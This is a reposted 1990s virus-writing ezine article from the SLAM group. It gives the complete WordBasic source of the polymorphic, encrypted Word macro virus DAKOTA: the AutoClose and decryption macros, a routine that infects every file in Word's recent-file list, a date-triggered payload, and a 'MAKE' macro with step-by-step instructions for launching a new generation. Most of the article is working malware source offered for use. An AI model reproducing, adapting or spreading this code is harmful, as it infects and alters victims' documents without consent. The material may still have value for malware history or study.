Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM2.005: The new encrypted Macro Virus DAKOTA

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 22 Feb 2022

[ WordMacro. DAKOTA ]------------------------ 

˛ VIRUSNAME:      DAKOTA 
˛ SIZE:           change at every infection 
˛ ORIGIN:         Germany 
˛ AUTHOR:         Nightmare Joker 

->Polymorf        Yes 
->Stealth         No 
->Encrypted       Yes 
->Retro           No 
----------------------------------------------

After FutureNot is here now a new polymorphic macro virus.
The virus contains 2 macros (AutoClose and DAKOTA) and 4 document variables:

  • CODE (contains the code to infect a file)
  • Payload (I think you know it)
  • counter (counter for the encryption routine)
  • DAKOTA (to check if any file is already infected)

OK, here is the source code: 

----------------------------------------------------------------- 

MACRO: AutoClose 
~~~~~~~~~~~~~~~~ 
Sub MAIN 

REM At first set ScreenUpdating Off and DisableInput On 
ScreenUpdating : DisableInput 

REM Open the DAKOTA macro, select and copy the complete code. 
ToolsMacro .Name = "DAKOTA", .Show = 3, .Edit 
EditSelectAll : ax$ = Selection$() 

REM Now remove all encryption signs. 
For ax = 1 To Len(ax$) 
bx$ = Mid$(ax$, ax, 1) 
If bx$ = Chr$(134) Or bx$ = Chr$(39) Then Goto Nexit 
dx$ = dx$ + bx$ 
Nexit: 
Next ax 

REM Delete the old encrypted code and insert the new decrypted code. 
EditClear - 1 : StartOfDocument : Insert dx$ 
DocClose 1 

REM Run the DAKOTA macro. 
DAKOTA 

REM Open it again, select and delete the complete code. 
ToolsMacro .Name = "DAKOTA", .Show = 3, .Edit 
EditSelectAll : EditClear - 1 

REM dx$ is the decrypted code of the DAKOTA macro. 
REM Encrypt now the code again. 
For xx = 1 To Len(dx$) 
hx$ = Mid$(dx$, xx, 1) 
fx = Rnd() : fx$ = Str$(fx) : fx$ = Right$(fx$, 1) : fx = Val(fx$) 
If fx < 3 Then 
	nj$ = nj$ + hx$ + Chr$(134) 
Else 
	nj$ = nj$ + hx$ 
End If 
Next xx 

REM Insert the encrypted code into the DAKOTA macro, 
REM go to top of the macro and insert at the 
REM beginning of every line a '. We must do that, because 
REM Word would insert a space behind every encryption sign and 
REM if we decrypt the code again, we will decrypt this space, too. 
Insert nj$ 
StartOfDocument 
Insert "'" 
For ix = 1 To 40 
LineDown 1 
StartO-ine 
Insert "'" 
Next ix 

REM Close and save the DAKOTA macro. 
REM Run and delete the DAKOTA2 macro. 
DocClose 1 : DAKOTA2 
ToolsMacro .Name = "DAKOTA2", .Show = 3, .Delete 

REM Save all and create a new string for the DAKOTA document variable. 
FileSaveAll 1, 0 
SetDocumentVar "DAKOTA", Str$(Rnd(v)) 

REM Set ScreenUpdating On and DisableInput Off 
ScreenUpdating : DisableInput 0 
End Sub 

----------------------------------------------------------------- 

MACRO: DAKOTA (of course, decrypted) 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
Sub MAIN 

REM Get the encrypted code and the counter for the decrypting routine. 
a$ = GetDocumentVar$("CODE") 
g$ = GetDocumentVar$("counter") : g = Val(g$)	 

REM decrypt now the code (a$) with the key (g). 
For a = 1 To Len(a$) 
b$ = Mid$(a$, a, 1) 
b = Asc(Mid$(a$, a, 1))	 
c = b + g 
If c > 255 Then c = c - 256	 
d$ = d$ + Chr$(c) 
Next 

REM Generate the new key. (I know thats very lame, but WordBasic 
REM is to laaammmeee to make a better encryption routine. :( ) 
g = g + 1 
If g = 255 Then g = 2 

REM Open a new macro, called DAKOTA2 and insert 
REM the decrypted code. 
ToolsMacro .Name = "DAKOTA2", .Show = 3, .Edit 
Insert d$ 

REM Close and save the macro.  
DocClose 1 : a$ = "" : b$ = "" : g$ = "" 

REM Now encrypt the code with the new key. 
For y = 1 To Len(d$) 
x = Asc(Mid$(d$, y, 1)) 
z = x - g 
If z < 0 Then z = z + 256 
e$ = e$ + Chr$(z) 
Next 

REM Save the encrypted code and the new key (counter) in 
REM a document variable. 
SetDocumentVar "counter", Str$(g) 
SetDocumentVar "CODE", e$ 

REM If today is 01/07/xx then 
REM get the encrypted code from the Payload document variable. 
If Day(Now()) = 1 And Month(Now()) = 7 Then 
k2$ = GetDocumentVar$("Payload") 

REM Decrypt it! 
For ay = 1 To Len(k2$) 
b2$ = Mid$(k2$, ay, 1) 
b2 = Asc(Mid$(k2$, ay, 1))	 
c2 = b2 + 1 
If c2 > 255 Then c2 = c2 - 256	 
d2$ = d2$ + Chr$(c2) 
Next 

REM Open a new macro, called FinalDAKOTA, select and 
REM delete the two lines. [Sub Main ... End Sub] 
ToolsMacro .Name = "FinalDAKOTA", .Show = 3, .Edit 
EditSelectAll : EditClear - 1 

REM Insert the decrypted code and save the macro. 
REM Set ScreenUpdating On and start the payload. 
Insert d2$ : DocClose 1 : ScreenUpdating 
FinalDAKOTA 

REM Set again ScreenUpdating Off. 
ScreenUpdating 
End If 
End Sub 

----------------------------------------------------------------- 

"CODE" document variable. (again decrypted) 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

REM This code mustn't contain the [MAIN Sub] and [End Sub] 
REM string, because if we open a new macro we get this to 
REM lines automatic. 

REM Set DisableAutoMacros On and get the code from the 
REM document variables CODE, counter and Payload. 
DisableAutoMacros 
ua$ = GetDocumentVar$("CODE") 
ub$ = GetDocumentVar$("counter") 
uc$ = GetDocumentVar$("Payload") 

REM iu$ = the name of the active document. 
iu$ = FileName$() 

REM Count all document names in the FileList 
REM and open every! 
For iu = 1 To CountFiles() 
If Files$(FileName$(iu)) <> "" Then 
FileList iu 

REM ju$ = the at the moment active file from the FileList 
ju$ = FileName$() 

REM If this file isn't the same as the infected one then 
REM check if it's allready infected. 
If iu$ <> ju$ Then 
uu$ = GetDocumentVar$("DAKOTA") 

REM If not then save it as a template and copy the macros to it. 
If uu$ = "" Then 
FileSaveAs .Format = 1 
MacroCopy iu$ + ":AutoClose", ju$ + ":", 1 
MacroCopy iu$ + ":DAKOTA", ju$ + ":" 

REM Save the document variables, too. 
SetDocumentVar "CODE", ua$ 
SetDocumentVar "counter", ub$ 
SetDocumentVar "DAKOTA", Str$(Rnd()) 
SetDocumentVar "Payload", uc$ 
End If 

REM At last close and save this file. 
FileClose 1 
End If 
End If 

REM Get the next file. 
Next iu 

REM Set DisableAutoMacros Off. 
DisableAutoMacros 0 

----------------------------------------------------------------- 

"Payload" document variable 
~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
Sub MAIN 

REM Create a new document. 
FileNew 
If DocMaximize() Then DocMaximize 
DocSize 234, 231 

REM Set the right Font, size 36, bold. 
Font "Times New Roman" 
Bold 
FontSize 36 

REM Insert "DAKOTA" and "(c) Nightmare Joker & Virtual Boy [SLAM]" 
Insert "DAKOTA!" 
InsertPara 
Bold 
FontSize 20 
InsertPara 
Insert "(c) Nightmare Joker" 
InsertPara 
InsertPara 
Insert "& Virtual Boy [SLAM]" 

REM And now let the document jump around the screen. ;-)) 
WaitCursor 0 
If DocMaximize() Then DocMaximize : i = 1 
j = DocWindowPosLeft() 
k = DocWindowPosTop() 
e = j 
f = k 
a = AppWindowWidth() - DocWindowWidth() 
b = AppWindowHeight() - DocWindowHeight() - 90 
c = 1 
d = 1 
g = 1 
For l = 0 To 29 
While h(a, b, c, d, e, f) 
DocWindowPosLeft e 
DocWindowPosTop f 
e = e + c * g 
f = f + d * g 
Wend 
If e > a Then c = - 1 
If f > b Then d = - 1 
If e < 0 Then c = 1 
If f < 0 Then d = 1 
Beep 
Next 
DocWindowPosLeft j 
DocWindowPosTop k 
If i Then DocMaximize 
End Sub 

Function h(a, b, c, d, e, f) 
h = 1 
If c = 1 Then 
If e > a Then h = 0 
Else 
If e < 0 Then h = 0 
End If 
If d = 1 Then 
If f > b Then h = 0 
Else 
If f < 0 Then h = 0 
End If 
End Function 

-----------------------------------------------------------------

The most difficult thing at this virus is to start him.

Here is a short description.

At first generate six macros. An AutoOpen, Dakota, CODE, and Payload macro.
Insert now the code. (see above)

IMPORTANT: Remove the tow lines: (MAIN Sub) and (Sub End) from the CODE and Payload macro!!!!!

OK, Now generate the MAKE macro and insert the following code: 

----------------------------------------------------------------- 

Sub MAIN 

REM Generate a new file. 
FileNew 

REM Save it as a template. 
FileSaveAs .Name = "c:\virus.doc", .Format = 1 

REM Copy now the macros "AutoOpen" and "DAKOTA" to it. 
MacroCopy "Global:AutoOpen", FileName$() + ":AutoOpen" 
MacroCopy "Global:DAKOTA", FileName$() + ":DAKOTA" 

REM Open the CODE macro and select all.  
ToolsMacro .Name = "CODE", .Show = 1, .Edit 
EditSelectAll 
a$ = Selection$() 

REM Close it. 
DocClose 2 

REM Encrypt now the code. 
For a = 1 To Len(a$) 
d = Asc(Mid$(a$, a, 1))	 
e = d - 1 
If e > 255 Then e = e - 256	 
f$ = f$ + Chr$(e) 
Next a 

REM Save this code in the CODE document variable. 
SetDocumentVar "CODE", f$ 

REM Open now the Payload macro and select all. 
ToolsMacro .Name = "Payload", .Show = 1, .Edit 
EditSelectAll 
b$ = Selection$() 

REM Close it. 
DocClose 2 

REM Again encrypt it! 
For a = 1 To Len(b$) 
d = Asc(Mid$(b$, a, 1))  
e = d - 1 
If e > 255 Then e = e - 256	 
h$ = h$ + Chr$(e) 
Next 

REM Save the code in the Payload document variable. 
SetDocumentVar "Payload", h$ 

REM Now save the counter and mark the file as infected. 
SetDocumentVar "counter", "1" 
SetDocumentVar "DAKOTA", "INFECTED" 

REM At last save all. 
FileSaveAll 1, 0 
End Sub 

-----------------------------------------------------------------

Start now the MAKE macro and you have a new generation of DAKOTA. :)

- Nightmare Joker -

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
15 May 2024
오우
guest's profile picture
@guest
15 May 2024
Sabung Ayam Online
guest's profile picture
@guest
15 May 2024
Situs Sabung Ayam Digmaan
guest's profile picture
@guest
15 May 2024
It’s kinda scary though
guest's profile picture
@guest
14 May 2024
Sabung Ayam Online
guest's profile picture
@guest
13 May 2024
I have fermented two different traditional and I am consistently having a Hydrogen Sulfide problem with my brews. It smells like a slight ro ...
guest's profile picture
@guest
13 May 2024
I made cider similar to this last year and it was an awesome base for Apple pie moonshine! It wasn't actual moonshine, but we blended th ...
DrWatson's profile picture
@DrWatson
12 May 2024
And also in this article the legendary civilization of Atlantis is present!
guest's profile picture
@guest
12 May 2024
I’ve read this digest for years. It has been a great source of mead making information.
guest's profile picture
@guest
11 May 2024
무섭다
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT